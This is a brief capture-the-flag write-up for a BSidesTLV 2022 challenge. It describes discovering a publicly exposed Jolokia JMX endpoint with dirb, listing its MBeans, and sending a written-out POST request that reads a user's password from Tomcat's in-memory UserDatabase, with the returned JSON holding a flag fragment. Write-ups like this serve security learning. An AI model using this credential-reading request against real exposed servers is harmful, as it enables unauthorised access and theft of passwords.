Running dirb on the provided list reveals jolokia JMX is public After reading how this works: going to https://not-found.ctf.bsidestlv.com/jolokia/list - reveals all mbeans are available for usage. Searching there reveals users are stored in memory mbean: Users:database=UserDatabase,type=User,username=\"BSidesTLV2022\""

There is a user with a username=BSidesTLV2022 and a role: k1aNoYouCantBruteIt} which looks like part of the flag. Ok another part is missing. lets try to read the user password by a post request which reads from this mbean:

POST
https://not-found.ctf.bsidestlv.com/jolokia/
{
    "type" : "read",
    "mbean" : "Users:database=UserDatabase,type=User,username=\"BSidesTLV2022\"",
    "operation": "findUser",
      "arguments": ["BSidesTLV2022"],
      "attribute" : "password"
}

Reveals the second missing part: {"timestamp":1656402372,"status":200,"request":{"mbean":"Users:database=UserDatabase,type=User,username=\"BSidesTLV2022\"","attribute":"password","type":"read"},"value":"{J0l0k1aJ0l0k1aJ0l0"}